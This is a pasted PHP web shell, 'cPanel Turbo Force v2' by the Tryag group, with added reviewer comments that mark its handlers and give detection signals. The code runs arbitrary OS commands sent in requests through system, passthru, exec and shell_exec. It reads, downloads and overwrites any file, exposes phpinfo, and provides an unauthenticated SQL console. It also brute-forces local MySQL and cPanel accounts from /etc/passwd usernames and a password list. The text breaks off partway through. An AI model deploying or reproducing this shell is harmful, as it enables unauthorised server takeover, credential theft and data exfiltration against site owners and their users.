
Untitled

a guest
Jul 20th, 2016
  1. <html>
  2. <title>cPanel Turbo Force v2</title>
  3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  4. <?php
  5. /*
  6. Turbo Force By Tryag.Cc
  7. */
  8. @set_time_limit(0); // removes PHP's max-execution-time cap for this request; '@' hides any failure of the call
  9. @error_reporting(0); // switches off reporting for every PHP error level, so faults in the code below produce no PHP error output
  10.  
  11.  
  12. echo '<head>
  13.  
  14. <style type="text/css">
  15. <!--
  16. body {
  17. background-color: #000000;
  18. font-size: 18px;
  19. color: #cccccc;
  20. }
  21. input,textarea,select{
  22. font-weight: bold;
  23. color: #cccccc;
  24. dashed #ffffff;
  25. border: 1px
  26. solid #2C2C2C;
  27. background-color: #080808
  28. }
  29. a {
  30. background-color: #151515;
  31. vertical-align: bottom;
  32. color: #000;
  33. text-decoration: none;
  34. font-size: 20px;
  35. margin: 8px;
  36. padding: 6px;
  37. border: thin solid #000;
  38. }
  39. a:hover {
  40. background-color: #080808;
  41. vertical-align: bottom;
  42. color: #333;
  43. text-decoration: none;
  44. font-size: 20px;
  45. margin: 8px;
  46. padding: 6px;
  47. border: thin solid #000;
  48. }
  49. .style1 {
  50. text-align: center;
  51. }
  52. .style2 {
  53. color: #FFFFFF;
  54. font-weight: bold;
  55. }
  56. .style3 {
  57. color: #FFFFFF;
  58. }
  59. -->
  60. </style>
  61.  
  62. </head>
  63. ';
  64.  
  65.  
  66. function in($type,$name,$size,$value,$checked=0)
      // Returns the markup for one <input> element as a string.
      //   $type, $name and $size are emitted as unquoted attribute values; $size is left out when it equals 0.
      //   $value is wrapped in double quotes; a truthy $checked appends " checked".
      // NOTE(review): none of the arguments is HTML-escaped. The caller on paste line 223 passes
      // $_POST values straight in, so request data is reflected into the page unmodified.
  67. {
  68. $ret = "<input type=".$type." name=".$name." "; if($size != 0)
  69. {
  70. $ret .= "size=".$size." "; }
  71. $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
  72.  
  73. class my_sql
      // Wrapper that drives one of four PHP database extensions, chosen by the string in $this->db
      // ('MySQL', 'MSSQL', 'PostgreSQL', 'Oracle'). Connection settings are plain public properties
      // that the caller fills in before calling connect(); paste line 201 fills them from $_POST.
      // Every extension call is prefixed with '@', so failures surface only through $this->error
      // and the integer return codes documented per method below.
      // NOTE(review): the mysql_* and mssql_* functions used here were removed in PHP 7.0; connect()
      // returns 0 when its connect function is missing, the other methods do not check.
  74. {
  75. var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
      // connect(): opens $this->connection for the selected backend.
      // Returns 1 on success, 0 on failure or when the backend's connect function does not exist.
      // An empty $this->port is replaced by 3306 (MySQL), 1433 (MSSQL) or 5432 (PostgreSQL).
      // On failure $this->error receives the driver message (fixed text for MSSQL).
  76. {
  77. switch($this->db)
  78. {
  79. case 'MySQL': if(empty($this->port))
  80. {
  81. $this->port = '3306'; }
  82. if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
  83. {
  84. $this->port = '1433'; }
  85. if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
  86. {
  87. $this->port = '5432'; }
  88. $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
  89. return 0; }
      // select_db(): selects $this->base on the open connection. Returns 1 on success, 0 on failure.
      // PostgreSQL and Oracle always return 1 here (the database name is already given at connect time).
  90. function select_db()
  91. {
  92. switch($this->db)
  93. {
  94. case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
  95. return 0; }
      // query($query): sends $query verbatim to the backend and stores the handle in $this->res.
      // Return codes: 0 = error ($this->error set); 1 = a result set is available for MySQL, MSSQL
      // and PostgreSQL; 2 = statement ran without a result set for those three backends.
      // The Oracle branch is the other way round: it returns 2 when ocirowcount() is non-zero, else 1.
      // The MySQL branch prepends a SQL comment containing a NUL byte ('/*' . chr(0) . '*/');
      // the reason is not visible in this file.
      // NOTE(review): that prefix is distinctive and might be matchable in MySQL query logs - confirm
      // it survives logging before relying on it.
  96. function query($query)
  97. {
  98. $this->res=$this->error=''; switch($this->db)
  99. {
  100. case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  101. {
  102. $this->error = @mysql_error($this->connection); return 0; }
  103. else if(is_resource($this->res))
  104. {
  105. return 1; }
  106. return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
  107. {
  108. $this->error = 'Query error'; return 0; }
  109. else if(@mssql_num_rows($this->res) > 0)
  110. {
  111. return 1; }
  112. return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
  113. {
  114. $this->error = @pg_last_error($this->connection); return 0; }
  115. else if(@pg_num_rows($this->res) > 0)
  116. {
  117. return 1; }
  118. return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
  119. {
  120. $this->error = 'Query parse error'; }
  121. else
  122. {
  123. if(@ociexecute($this->res))
  124. {
  125. if(@ocirowcount($this->res) != 0) return 2; return 1; }
  126. $error = @ocierror(); $this->error=$error['message']; }
  127. break; }
  128. return 0; }
      // get_result(): drains $this->res into $this->rows (associative arrays), frees the handle and
      // fills $this->columns from the keys of the first row. Returns 1 when at least one row was
      // counted, otherwise 0.
      // The fetch loops assign into $this->rows[] before testing for false, so the terminating
      // false is stored as a trailing element; the callers shown iterate by $this->num_rows.
  129. function get_result()
  130. {
  131. $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
  132. {
  133. case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
  134. {
  135. $this->columns = @array_keys($this->rows[0]); return 1;}
  136. break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
  137. {
  138. $this->columns = @array_keys($this->rows[0]); return 1;}
  139. ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
  140. {
  141. $this->columns = @array_keys($this->rows[0]); return 1;}
  142. break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
  143. {
  144. $this->columns = @array_keys($this->rows[0]); return 1;}
  145. break; }
  146. return 0; }
      // dump($table): builds a textual export of one table in $this->dump: a '##' header block,
      // then (MySQL only) the SHOW CREATE TABLE output, then one INSERT statement per row.
      // Returns 1 when the export was built, 0 on an empty name, unknown backend or query failure.
      // The Oracle branch only writes a placeholder line.
      // $table is concatenated into the SQL text without quoting or validation.
      // No call to dump() appears in the lines shown.
  147. function dump($table)
  148. {
  149. if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
  150. {
  151. case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  152. {
  153. foreach($this->rows[$i] as $k=>$v)
  154. {
  155. $this->rows[$i][$k] = @mysql_real_escape_string($v);}
  156. $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  157. break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  158. {
  159. foreach($this->rows[$i] as $k=>$v)
  160. {
  161. $this->rows[$i][$k] = @addslashes($v);}
  162. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  163. break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  164. {
  165. foreach($this->rows[$i] as $k=>$v)
  166. {
  167. $this->rows[$i][$k] = @addslashes($v);}
  168. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  169. break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
  170. return 1; }
      // close(): closes $this->connection with the backend's close function; no return value.
  171. function close()
  172. {
  173. switch($this->db)
  174. {
  175. case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
  176. }
      // affected_rows(): returns the backend's affected-row count for $this->res, or 0 for an
      // unknown backend.
      // NOTE(review): the MySQL branch passes the stored result ($this->res) rather than the
      // connection; mysql_affected_rows() is documented to take a link identifier - verify.
  177. function affected_rows()
  178. {
  179. switch($this->db)
  180. {
  181. case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
  182. }
  183. }
  184. if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
       // File-download handler: runs when POST field cccc is "download_file" and d_name is non-empty.
       // d_name is used as the path for fopen()/filesize() exactly as received, so any file readable
       // by the PHP process can be sent back as an attachment. No authentication check appears in
       // the lines shown.
       // err() and compress() are not defined in the lines shown. $content_encoding and $mime_type
       // are set to '' here and are not passed to compress(), so they presumably stay empty unless
       // compress() changes them through globals - confirm.
       // Review signal: POST bodies carrying cccc=download_file together with a d_name path.
  185. {
  186. if(!$file=@fopen($_POST['d_name'],"r"))
  187. {
  188. err(1,$_POST['d_name']); $_POST['cccc']=""; }
  189. else
  190. {
  191. @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
  192. {
  193. header('Content-Encoding: ' . $content_encoding); }
  194. header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
  195. }
  196. if(isset($_GET['phpinfo']))
       // Any request whose query string contains a "phpinfo" parameter gets the full phpinfo()
       // report (PHP configuration, loaded modules, environment), then the script stops.
       // $_SERVER['PHP_SELF'] is written into the link without escaping.
  197. {
  198. echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  199. if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
       // SQL console handler: runs when POST field cccc is "db_query".
       // Backend type, host, port, user, password and database all come from POST fields
       // (db, db_server, db_port, mysql_l, mysql_p, mysql_db). db_query is split on ';' and every
       // piece longer than 5 characters is executed as a separate statement via my_sql::query().
       // Output handling: the query text, column names and cell values go through
       // htmlspecialchars(); $sql->error, the hidden form fields, the "Base" input and the textarea
       // echo their values without escaping. The submitted password is written back into the page
       // as the hidden field mysql_p.
       // $head is echoed but is not assigned anywhere in the lines shown.
       // The switch compares the integer return code of query() with the string labels '0', '1', '2'.
       // Review signal: POST bodies carrying cccc=db_query with mysql_l / mysql_p / db_query fields.
  200. {
  201. echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  202. {
  203. if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  204. {
  205. foreach($querys as $num=>$query)
  206. {
  207. if(strlen($query)>5)
  208. {
  209. echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
  210. {
  211. case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
  212. {
  213. echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
  214. {
  215. foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
  216. echo "</table>"; }
  217. break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
  218. }
  219. }
  220. }
  221. }
  222. echo "<br><title>Turbo Force By Tryag</title><form name=form method=POST>";
  223. echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
  224. echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  225.  
  226.  
  227.  
  228.  
  229.  
  230.  
  231.  
  232.  
  233.  
  234.  
  235.  
  236.  
  237.  
  238.  
  239.  
  240.  
  241.  
  242.  
  243.  
  244.  
  245.  
  246.  
  247.  
  248. function ccmmdd($ccmmdd2,$att)
       // Renders the command form and runs the submitted command, then exits.
       // The two parameters are not used for the work: everything is read from $_POST.
       //   $_POST['att']     - which PHP function to call: system, passthru, exec or shell_exec
       //   $_POST['ccmmdd2'] - the command string, handed to that function exactly as received
       // The command therefore runs with the privileges of the PHP process; no authentication or
       // validation appears in the lines shown. Both POST values are also echoed back into the
       // form without escaping.
       // Mitigation/detection notes: all four functions can be switched off with the
       // disable_functions php.ini directive; requests to this page carry POST fields
       // page=ccmmdd, att and ccmmdd2.
  249. {
  250. global $ccmmdd2,$att;
  251. echo '
  252. <table style="width: 100%" class="style1" dir="rtl">
  253. <tr>
  254. <td class="style9"><strong>موجة الأومر</strong></td>
  255. </tr>
  256. <tr>
  257. <td class="style13">
  258. <form method="post">
  259. <select name="att" dir="rtl" style="height: 109px" size="6">
  260. ';
       // Pre-select the previously submitted function name, or "system" on first display.
  261. if($_POST['att']==null)
  262. {
  263. echo ' <option value="system" selected="">system</option>';
  264. }else{
  265. echo " <option value='$_POST[att]' selected=''>$_POST[att]</option>
  266. <option value=system>system</option>
  267. ";
  268.  
  269.  
  270. }
  271.  
  272. echo '
  273. <option value="passthru">passthru</option>
  274. <option value="exec">exec</option>
  275. <option value="shell_exec">shell_exec</option>
  276. </select>
  277. <input name="page" value="ccmmdd" type="hidden"><br>
  278. <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
  279. <input type="submit" value="تنفيذ">
  280. </form>
  281.  
  282. </td>
  283. </tr>
  284. <tr>
  285. <td class="style13">
  286. ';
  287.  
       // The four branches below index $_POST with the bare word att (no quotes). PHP 8 treats an
       // undefined constant as an Error; older versions fall back to the string 'att' with a notice.
  288. if($_POST[att]=='system')
  289. {
  290. echo '
  291. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  292. system($_POST['ccmmdd2']); // request-supplied string executed as an OS command; output goes straight into the textarea
  293. echo ' </textarea>';
  294.  
  295.  
  296. }
  297.  
  298. if($_POST[att]=='passthru')
  299. {
  300. echo '
  301. <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  302. passthru($_POST['ccmmdd2']); // same request-supplied string, executed through passthru()
  303. echo ' </textarea>';
  304.  
  305.  
  306. }
  307.  
  308.  
  309.  
  310.  
  311.  
  312. if($_POST[att]=='exec')
  313. {
  314.  
  315. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  316. exec($_POST['ccmmdd2'],$res); // same string through exec(); output lines are collected in $res
  317. echo $res = join("\n",$res);
  318. echo ' </textarea>';
  319.  
  320.  
  321. }
  322.  
  323.  
  324.  
  325.  
  326.  
  327.  
  328.  
  329. if($_POST[att]=='shell_exec')
  330. {
  331.  
  332. echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  333. echo shell_exec($_POST['ccmmdd2']); // same string through shell_exec(); the returned output is echoed unescaped
  334. echo ' </textarea>';
  335.  
  336.  
  337. }
  338. echo '
  339. </td>
  340. </tr>
  341. </table>
  342. ';
  343.  
  344. exit;
  345. }
  346.  
  347. if($_POST['page']=='edit')
       // File-write handler: runs when POST field page is "edit".
       // Overwrites the file named by $pathclass with the submitted "code" field, after converting
       // CRLF to LF and stripping every backslash from the text.
       // NOTE(review): this branch never assigns $pathclass; it is only populated if something
       // outside these lines does so (for example register_globals on very old PHP) - confirm.
       // The result of fopen() is not checked, and no authentication appears in the lines shown.
       // Review signal: POST bodies carrying page=edit with pathclass and code fields; unexpected
       // modification times on files writable by the PHP process.
  348. {
  349.  
  350. $code=@str_replace("\r\n","\n",$_POST['code']);
  351. $code=@str_replace('\\','',$code);
  352. $fp = fopen($pathclass, 'w');
  353. fwrite($fp,"$code");
  354. fclose($fp);
  355. echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  356. exit;
  357. }
  358.  
  359.  
  360.  
  361.  
  362.  
  363.  
  364.  
  365. if($_POST['page']=='show')
       // File-view handler: runs when POST field page is "show".
       // Opens the path given in POST field pathclass, reads the whole file and shows it inside an
       // edit form whose submit target is the page=edit branch. Any file readable by the PHP
       // process can be displayed; no authentication appears in the lines shown.
       // The file content is passed through htmlspecialchars(); the path itself is echoed twice
       // without escaping.
  366. {
  367. $pathclass =$_POST['pathclass'];
  368. echo '
  369. <form method="POST">
  370. <input type="hidden" name="page" value="edit">
  371. ';
  372.  
  373. $sahacker = fopen($pathclass, "rb");
  374. echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';
  375. $code = fread($sahacker, filesize($pathclass));
  376. echo $code =htmlspecialchars($code);
  377. echo '</textarea>';
  378. fclose($sahacker);
  379. echo '
  380. <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
  381. <br><strong><input type="submit" value="edit file">
  382. </form>
  383. ';
  384. exit;
  385. }
  386.  
  387.  
  388.  
  389.  
  390. if($_POST['page']=='ccmmdd')
       // Dispatches POST page=ccmmdd to the command-execution function ccmmdd().
       // $ccmmdd2 and $att are not assigned in the lines shown; ccmmdd() reads $_POST itself and
       // exits, so the echo and the exit below are not reached.
  391. {
  392. echo ccmmdd($ccmmdd2,$att);
  393. exit;
  394. }
  395.  
  396.  
  397.  
  398.  
  399.  
  400.  
  401.  
  402.  
  403.  
  404.  
  405.  
  406.  
  407.  
  408.  
  409.  
  410.  
  411.  
  412.  
  413.  
  414.  
  415.  
  416.  
  417.  
  418.  
  419. if($_POST['page']=='find')
       // Credential-guessing handler: runs when POST field page is "find" and both the usernames
       // and passwords fields are present.
       // Usernames come either one per line ("simple") or as the first ':'-separated field of each
       // line ("passwd", i.e. /etc/passwd format). Every username is then tried with every
       // password line against the MySQL server on localhost via mysql_connect(); each accepted
       // pair is printed, followed by a total.
       // The inner loop condition is $i<=$id2, one past the last password index, so each username
       // also produces one attempt with an empty password.
       // mysql_connect() was removed in PHP 7.0, so this branch only works on older PHP.
       // Detection notes: the activity shows up on the database side as a burst of failed logins
       // from localhost spread across many account names; on the web side as a long-running POST
       // with page=find, usernames and passwords fields (the time limit is lifted at paste line 8).
  420. {
  421. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  422. {
  423. if($_POST['type'] == 'passwd'){
  424. $e = explode("\n",$_POST['usernames']);
  425. foreach($e as $value){
  426. $k = explode(":",$value);
  427. $username .= $k['0']." ";
  428. }
  429. }elseif($_POST['type'] == 'simple'){
  430. $username = str_replace("\n",' ',$_POST['usernames']);
  431. }
  432. $a1 = explode(" ",$username);
  433. $a2 = explode("\n",$_POST['passwords']);
  434. $id2 = count($a2);
  435. $ok = 0;
  436. foreach($a1 as $user )
  437. {
  438. if($user !== '')
  439. {
  440. $user=trim($user);
  441. for($i=0;$i<=$id2;$i++)
  442. {
  443. $pass = trim($a2[$i]);
  444. if(@mysql_connect('localhost',$user,$pass))
  445. {
  446. echo "TrYag~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
  447. $ok++;
  448. }
  449. }
  450. }
  451. }
  452. echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By Tryag Script Name</b>";
  453. echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  454. exit;
  455. }
  456. }
  457. ?>
  458.  
  459.  
  460.  
  461.  
  462. <form method="POST" target="_blank">
  463. <strong>
  464. <input name="page" type="hidden" value="find">
  465. </strong>
  466. <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  467. <tr>
  468. <td valign="top" bgcolor="#151515"><center><strong><img src="http://www.tryag.cc/img/logo-team.gif" /><br>
  469. </strong>
  470. <a href="http://tryag.cc" class="style2"><strong>Turbo Force By Tryag</strong></a></center></td>
  471. </tr>
  472. <tr>
  473. <td>
  474. <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  475. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  476. <strong>User :</strong></td>
  477. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
  478. </tr>
  479. <tr>
  480. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  481. <strong>Pass :</strong></td>
  482. <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
  483. </tr>
  484. <tr>
  485. <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  486. <strong>Type :</strong></td>
  487. <td valign="top" bgcolor="#151515" colspan="5">
  488. <span class="style2"><strong>Simple : </strong> </span>
  489. <strong>
  490. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  491. <font class="style2"><strong>/etc/passwd : </strong> </font>
  492. <strong>
  493. <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  494. </strong>
  495. </span>
  496. </td>
  497. </tr>
  498. <tr>
  499. <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  500. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
  501. </strong>
  502. </td>
  503. <tr>
  504. </form>
  505.  
  506. <td valign="top" colspan="6"><strong></strong></td>
  507.  
  508. <form method="POST" target="_blank">
  509. <strong>
  510. <input type="hidden" name="go" value="cmd_mysql">
  511. </strong>
  512. <tr>
  513. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
  514. </tr>
  515. <tr>
  516. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
  517. <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
  518. <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
  519. <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
  520. <td valign="top" bgcolor="#151515"><strong>database</strong></td>
  521. <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
  522. </tr>
  523. <tr>
  524. <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
  525. <strong>cmd ~</strong></td>
  526. <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
  527. <strong>
  528. <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
  529. SHOW TABLES user_vb ;
  530. SELECT * FROM user;
  531. SELECT version();
  532. SELECT user();</textarea></strong></td>
  533. </tr>
  534. <tr>
  535. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  536. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
  537. </tr>
  538. <input name="db" value="MySQL" type="hidden">
  539. <input name="db_server" type="hidden" value="localhost">
  540. <input name="db_port" type="hidden" value="3306">
  541. <input name="cccc" type="hidden" value="db_query">
  542.  
  543. </form>
  544. <tr>
  545. <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
  546.  
  547.  
  548. </tr>
  549.  
  550. <form method="POST" target="_blank">
  551. <tr>
  552. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD
  553. system - passthru - exec - shell_exec</strong></td>
  554. </tr>
  555. <tr>
  556. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
  557. <td valign="top" bgcolor="#151515" colspan="5">
  558. <select name="att" dir="rtl" size="1">
  559. <?php
  560. if($_POST['att']==null) // no function name submitted yet: offer "system" as the pre-selected option
  561. {
  562. echo ' <option value="system" selected="">system</option>';
  563. }else{ // otherwise echo the submitted att value back as the selected option, without HTML escaping
  564. echo " <option value='$_POST[att]' selected=''>$_POST[att]</option>
  565. <option value=system>system</option>
  566. ";
  567.  
  568.  
  569. }
  570. ?>
  571.  
  572. <option value="passthru">passthru</option>
  573. <option value="exec">exec</option>
  574. <option value="shell_exec">shell_exec</option>
  575. </select>
  576. <strong>
  577. <input name="page" type="hidden" value="ccmmdd">
  578. <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
  579. </tr>
  580. <tr>
  581. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  582. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
  583. </tr>
  584. </form>
  585.  
  586. <form method="POST" target="_blank">
  587.  
  588. <tr>
  589. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show
  590. File And Edit</strong></td>
  591. </tr>
  592. <tr>
  593. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
  594. <td valign="top" bgcolor="#151515" colspan="5">
  595. <strong>
  596. <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
  597. </tr>
  598. <tr>
  599. <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  600. <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
  601. </tr>
  602. <input name="page" type="hidden" value="show">
  603. </form>
  604. <tr>
  605. <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
  606. Security</strong></td>
  607. </tr>
  608. <tr>
  609. <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  610. <td valign="top" bgcolor="#151515" colspan="5">
  611. <strong>
  612. <?php
  613. $safe_mode = ini_get('safe_mode'); // reads the safe_mode ini setting; the directive was removed in PHP 5.4
